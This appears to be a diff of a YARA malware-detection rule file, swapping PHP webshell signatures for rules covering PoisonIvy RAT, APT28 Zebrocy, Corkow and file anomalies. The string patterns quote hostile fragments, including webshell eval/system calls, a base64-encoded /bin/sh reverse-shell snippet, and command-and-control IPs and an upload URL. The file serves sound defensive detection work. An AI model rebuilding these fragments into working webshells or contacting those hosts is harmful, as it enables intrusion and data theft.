-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+		description = "Detects a PoisonIvy Sample APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be335331-34d7-5abc-b29b-eac7a5ec3915"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6933-L6952"
+		id = "02bf546b-99a2-5ffb-8ee7-7bb005ef953b"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L79-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a63d3b00ad9719140da9bb5dcb49981c4d3758fac13c392d016b47e54f356c8"
-		score = 75
+		hash = "558f0f0b728b6da537e2666fbf32f3c9c7bd4c0c"
+		logic_hash = "7ba10269d31e985dff582ae4103ef1179172ae475e078161864f185380bb5035"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
-		$s4 = "\\$port = {$_POST['port']};"
-		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
-		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
-		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
+		$s0 = "Microsoft Software installation Service" fullword wide
+		$s1 = "idll.dll" fullword ascii
+		$s2 = "mgmts.dll" fullword wide
+		$s3 = "Microsoft(R) Windows(R)" fullword wide
+		$s4 = "ServiceMain" fullword ascii
+		$s5 = "Software installation Service" fullword wide
+		$s6 = "SetServiceStatus" fullword ascii
+		$s7 = "OriginalFilename" fullword wide
+		$s8 = "ZwSetInformationProcess" fullword ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
 }
-rule SIGNATURE_BASE_Webshell__Crystalshell_V_1_Erne_Stres
+rule SIGNATURE_BASE_Poisonivy_Sample_5 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
+		description = "Detects PoisonIvy RAT sample set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4e73e42e-b968-5b68-a00d-d2a8a1f3541c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6953-L6974"
+		id = "61f7efd4-745a-5f06-a66d-b4b2a2ecc614"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L103-L123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a0484a5a71715d6a79c89e20919ab89aaa7e85a18ee502651f1f6b29153847a3"
-		score = 75
+		hash = "545e261b3b00d116a1d69201ece8ca78d9704eb2"
+		logic_hash = "3f88b673b80b67a110915285a87ead265ad0176ea414426ba55e780e3aa396fe"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
-		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
-		$s4 = "var_dump(curl_exec($ch));" fullword
-		$s7 = "if(empty($_POST['Mohajer22'])){" fullword
-		$s10 = "$m=$_POST['curl'];" fullword
-		$s13 = "$u1p=$_POST['copy'];" fullword
-		$s14 = "if(empty(\\$_POST['cmd'])){" fullword
-		$s15 = "$string = explode(\"|\",$string);" fullword
-		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
+		$s0 = "Microsoft Software installation Service" fullword wide
+		$s2 = "pidll.dll" fullword ascii
+		$s3 = "\\mspmsnsv.dll" ascii
+		$s4 = "\\sfc.exe" ascii
+		$s13 = "ServiceMain" fullword ascii
+		$s15 = "ZwSetInformationProcess" fullword ascii
+		$s17 = "LookupPrivilegeValueA" fullword ascii
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_3
+rule SIGNATURE_BASE_Poisonivy_Sample_6 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive"
+		description = "Detects PoisonIvy RAT sample set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff7c6534-efcf-565e-bfc0-1eaa2e9d7b7d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6975-L6994"
+		id = "f364fad0-3684-5500-b21b-396f1e259217"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L126-L164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5c264a294fc75cf2cadd3dba61bc64658989ffe5ddecfa18ba18e66492ad3c71"
-		score = 75
+		logic_hash = "0d77fd224b8d2dfd506faf0d3e359bf04172cc2854dc737e05c4bf99d0e1f3f7"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
-		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
-		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
-		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
+		hash1 = "8c2630ab9b56c00fd748a631098fa4339f46d42b"
+		hash2 = "36b4cbc834b2f93a8856ff0e03b7a6897fb59bd3"
 
 	strings:
-		$s0 = "header('Content-Length:'.filesize($file).'');" fullword
-		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
-		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
-		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
-		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
+		$x1 = "124.133.252.150" fullword ascii
+		$x3 = "http://124.133.254.171/up/up.asp?id=%08x&pcname=%s" fullword ascii
+		$z1 = "\\temp\\si.txt" ascii
+		$z2 = "Daemon Dynamic Link Library" fullword wide
+		$z3 = "Microsoft Windows CTF Loader" fullword wide
+		$z4 = "\\tappmgmts.dll" ascii
+		$z5 = "\\appmgmts.dll" ascii
+		$s0 = "%USERPROFILE%\\AppData\\Local\\Temp\\Low\\ctfmon.log" fullword ascii
+		$s1 = "%USERPROFILE%\\AppData\\Local\\Temp\\ctfmon.tmp" fullword ascii
+		$s2 = "\\temp\\ctfmon.tmp" ascii
+		$s3 = "SOFTWARE\\Classes\\http\\shell\\open\\commandV" fullword ascii
+		$s4 = "CONNECT %s:%i HTTP/1.0" fullword ascii
+		$s5 = "start read histry key" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
+		$s7 = "[password]%s" fullword ascii
+		$s8 = "Daemon.dll" fullword ascii
+		$s9 = "[username]%s" fullword ascii
+		$s10 = "advpack" fullword ascii
+		$s11 = "%s%2.2X" fullword ascii
+		$s12 = "advAPI32" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 8 of ( $s* ) ) or ( 1 of ( $z* ) and 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_4
+rule SIGNATURE_BASE_Poisonivy_Sample_7 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
+		description = "Detects PoisonIvy RAT sample set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2932cb85-927e-536b-b8d8-a0ac0d1ef8ec"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6995-L7017"
+		id = "01224053-d95e-5144-981b-76cd7e57e1c3"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L166-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "18db4c6728f0575b4d8388dab9563ee98ca9aa5fdc8534bf76856a87820b4596"
-		score = 75
+		hash = "9480cf544beeeb63ffd07442233eb5c5f0cf03b3"
+		logic_hash = "28db3fb7fa5b5e60ad1d1cc2b6d3d9d30a1948491105439201574ca354eb8bd1"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
-		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
-		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
-		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
-		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
-		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
-		$s10 = "foreach ($arr as $filename) {" fullword
-		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
+		$s0 = "Microsoft Software installation Service" fullword wide
+		$s2 = "pidll.dll" fullword ascii
+		$s10 = "ServiceMain" fullword ascii
+		$s11 = "ZwSetInformationProcess" fullword ascii
+		$s12 = "Software installation Service" fullword wide
+		$s13 = "Microsoft(R) Windows(R) Operating System" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_GFS
+rule SIGNATURE_BASE_Poisonivy_RAT_Ssmuidll : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bde6cfd8-466f-528a-b1e3-f874aa778010"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7019-L7035"
+		description = "Detects PoisonIvy RAT DLL mentioned in Palo Alto Blog in April 2016"
+		author = "Florian Roth (Nextron Systems) (with the help of yarGen and Binarly)"
+		id = "f2535b70-cf17-5435-9fc8-2dfdf70d95ac"
+		date = "2016-04-22"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/WiwtYT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L196-L230"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "72a3f117cb11e1461b760c47a3de74283640b6e1daa87b24e45210213bb76609"
+		logic_hash = "d048d88cac40f4fe3affee8d9dad35a7347a5459fbdd56b08a77ece4f6c2ac08"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
-		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
-		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
+		tags = "FILE"
+		hash1 = "7a424ad3f3106b87e8e82c7125834d7d8af8730a2a97485a639928f66d5f6bf4"
+		hash2 = "6eb7657603edb2b75ed01c004d88087abe24df9527b272605b8517a423557fe6"
+		hash3 = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
+		hash4 = "8b805f508879ecdc9bba711cfbdd570740c4825b969c1b4db980c134ac8fef1c"
+		hash5 = "ac99d4197e41802ff9f8852577955950332947534d8e2a0e3b6c1dd1715490d4"
 
 	strings:
-		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
-		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
-		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
+		$s1 = "ssMUIDLL.dll" fullword ascii
+		$op1 = { 6a 00 c6 07 e9 ff d6 }
+		$op2 = { 02 cb 6a 00 88 0f ff d6 47 ff 4d fc 75 }
+		$op3 = { 6a 00 88 7f 02 ff d6 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and ( all of ( $op* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Webshell__Crystalshell_V_1_Sosyete_Stres
+rule SIGNATURE_BASE_Apt28_Win_Zebrocy_Golang_Loader_Modified : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "774f7f4c-724a-5eb0-b5de-44b389fd593d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7036-L7056"
+		description = "Detects unpacked modified APT28/Sofacy Zebrocy Golang."
+		author = "@VK_Intel"
+		id = "cce9ba6c-954c-5b13-a058-cdf7895d63fc"
+		date = "2018-12-25"
+		modified = "2023-12-05"
+		reference = "https://www.vkremez.com/2018/12/lets-learn-progression-of-apt28sofacy.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_zebrocy.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "78aeabe38f7457060d81c3863098b5e424bc38f13e9e86bbb6ea54827f27afcd"
+		logic_hash = "799f4457eb2bdeeb7c9383e2b4e9572a41d9adbfe4a1a9c3b0fa1c9fc6077e40"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
-		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+		quality = 79
+		tags = "FILE"
 
 	strings:
-		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
-		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
-		$s11 = "scrollbar-darkshadow-color: #101842;" fullword
-		$s15 = "<a bookmark=\"minipanel\">" fullword
-		$s16 = "background-color: #EBEAEA;" fullword
-		$s18 = "color: #D5ECF9;" fullword
-		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
+		$go = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 }
+		$init = { 6d 61 69 6e 2e 69 6e 69 74 }
+		$main = "main" ascii wide fullword
+		$scr_git = {67 69 74 68 75 62 2e 63 6f 6d 2f 6b 62 69 6e 61}
+		$s0 = "os/exec.(*Cmd).Run" fullword ascii
+		$s1 = "net/http.(*http2clientConnReadLoop).processHeaders" fullword ascii
+		$s2 = "os.MkdirAll" fullword ascii
+		$s3 = "os.Getenv" fullword ascii
+		$s4 = "os.Create" fullword ascii
+		$s5 = "io/ioutil.WriteFile" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and $go and $init and all of ( $s* ) and #main > 10 and #scr_git > 5
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_10
+
+rule SIGNATURE_BASE_Corkowdll : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f52013d6-72ce-544c-a7ef-ae2a2ea87108"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7057-L7077"
+		description = "Rule to detect the Corkow DLL files"
+		author = "Group IB"
+		id = "cc9d2bb3-8db3-54a0-bd05-7f054ce84633"
+		date = "2016-01-02"
+		modified = "2023-12-05"
+		reference = "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_corkow_dll.yar#L3-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bf731edef55cde5d2ad16510fb9f1a240c1a06b535af7e13300fdbea470df74"
+		logic_hash = "072112c79f20ba08b7ef71d3dacff7eb947b4a27bf6381ce788e229f2f791cdf"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
-		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
-		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
-		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
+		tags = "FILE"
 
 	strings:
-		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
-		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
-		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
-		$s12 = "else if( $mode & 0xA000 ) " fullword
-		$s17 = "$s=sprintf(\"%1s\", $type); " fullword
-		$s20 = "font-size: 8pt;" fullword
+		$binary1 = { 60 [0-8] 9C [0-8] BB ?? ?? ?? ?? [0-8] 81 EB ?? ?? ?? ?? [0-8] E8 ?? 00 00 00 [0-8] 58 [0-8] 2B C3 }
+		$binary2 = { (FF 75 ?? | 53) FF 75 10 FF 75 0C FF 75 08 E8 ?? ?? ?? ?? [3-9] C9 C2 0C 00 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $binary* ) and ( pe.exports ( "Control_RunDLL" ) or pe.exports ( "ServiceMain" ) or pe.exports ( "DllGetClassObject" ) ) or ( pe.exports ( "ServiceMain" ) and pe.exports ( "Control_RunDLL" ) ) )
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_11
+rule SIGNATURE_BASE_Suspicious_Autoit_By_Microsoft : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
+		description = "Detects a AutoIt script with Microsoft identification"
 		author = "Florian Roth (Nextron Systems)"
-		id = "590c5320-ef85-5522-94fd-4619749f7eb1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7078-L7100"
+		id = "69b1c93d-ab12-5fdc-b6eb-fb135796d3a9"
+		date = "2017-12-14"
+		modified = "2025-08-13"
+		reference = "Internal Research - VT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L381-L396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5a559a26314ce603d6454efb71f1243bf89daed920ca2a495a51b94a4cca0045"
-		score = 75
+		logic_hash = "7dfbaf7d136bd9e151c533b49394a9a596450d9cc2643dc144cb693290004591"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
-		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
-		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
-		hash3 = "80aba3348434c66ac471daab949871ab16c50042"
+		hash1 = "c0cbcc598d4e8b501aa0bd92115b4c68ccda0993ca0c6ce19edd2e04416b6213"
 
 	strings:
-		$s5 = "$filename = $backupstring.\"$filename\";" fullword
-		$s6 = "while ($file = readdir($folder)) {" fullword
-		$s7 = "if($file != \".\" && $file != \"..\")" fullword
-		$s9 = "$backupstring = \"copy_of_\";" fullword
-		$s10 = "if( file_exists($file_name))" fullword
-		$s13 = "global $file_name, $filename;" fullword
-		$s16 = "copy($file,\"$filename\");" fullword
-		$s18 = "<td width=\"49%\" height=\"142\">" fullword
+		$s1 = "Microsoft Corporation. All rights reserved" fullword wide
+		$s2 = "AutoIt" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Webshell__Findsock_Php_Findsock_Shell_Php_Reverse_Shell
+rule SIGNATURE_BASE_SUSP_Size_Of_ASUS_Tuningtool : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
+		description = "Detects an ASUS tuning tool with a suspicious size"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6567c8f1-bd7f-5844-b937-3db2d8eb7408"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7101-L7115"
+		id = "d22a1bf9-55d6-5cb4-9537-ad13b23af4d1"
+		date = "2018-10-17"
+		modified = "2022-12-21"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L398-L413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2459f7114482e17f087bda4b638c29e237f2f3cb5a9e41e326ed65fc1834b6be"
-		score = 75
+		logic_hash = "5aadb48f61947ff0362bde5f80830b835ca9e3cb7e1c632d153d0ea5f8bbad6c"
+		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
-		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
-		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
+		tags = "FILE"
+		noarchivescan = 1
+		hash1 = "d4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a"
 
 	strings:
-		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
+		$s1 = "\\Release\\ASGT.pdb" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and filesize > 70KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_6
+rule SIGNATURE_BASE_SUSP_Piratedoffice_2007 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive"
+		description = "Detects an Office document that was created with a pirated version of MS Office 2007"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e61ec617-565a-5b24-82f4-3677ef379a06"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7116-L7137"
+		id = "b36e9a59-7617-503b-968d-5b6b72b227ea"
+		date = "2018-12-04"
+		modified = "2025-08-13"
+		reference = "https://twitter.com/pwnallthethings/status/743230570440826886?lang=en"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L415-L428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7b3f2ca3cb9516ddda1b9cac2ca5eb5d9e62e1839dad041f69a3dc7a2a186897"
-		score = 75
+		logic_hash = "ff94483944a4a4e4bc3cba26fc08fc2a5239f27b301b2ca7cca5edc092c2fc73"
+		score = 40
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
-		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+		tags = "FILE"
+		hash1 = "210448e58a50da22c0031f016ed1554856ed8abe79ea07193dc8f5599343f633"
 
 	strings:
-		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
-		$s5 = "echo shell_exec($com);" fullword
-		$s7 = "if($sertype == \"winda\"){" fullword
-		$s8 = "function execute($com)" fullword
-		$s12 = "echo decode(execute($cmd));" fullword
-		$s15 = "echo system($com);" fullword
+		$s7 = "<Company>Grizli777</Company>" ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0xcfd0 and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Unpack_Injectt
+rule SIGNATURE_BASE_SUSP_Scheduled_Task_Bigsize : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file Injectt.exe"
+		description = "Detects suspiciously big scheduled task XML file as seen in combination with embedded base64 encoded PowerShell code"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80dc3086-41a6-5e30-bbf4-463500fe5e33"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7139-L7152"
+		id = "61b07b30-1058-5a53-99e7-2c48ec9d23b5"
+		date = "2018-12-06"
+		modified = "2025-08-13"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L430-L446"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8a5d2158a566c87edc999771e12d42c5"
-		logic_hash = "d8e9ed4f2604617bd6410f36ab827affa3cc6729ba996d0d9cd9c8eb0fd96533"
-		score = 75
+		logic_hash = "dcc06261b1ea39c587d8bcefbb8e85e6b9016da01bf66c2eefe5bd7bbdfc6968"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s2 = "%s -Run                              -->To Install And Run The Service"
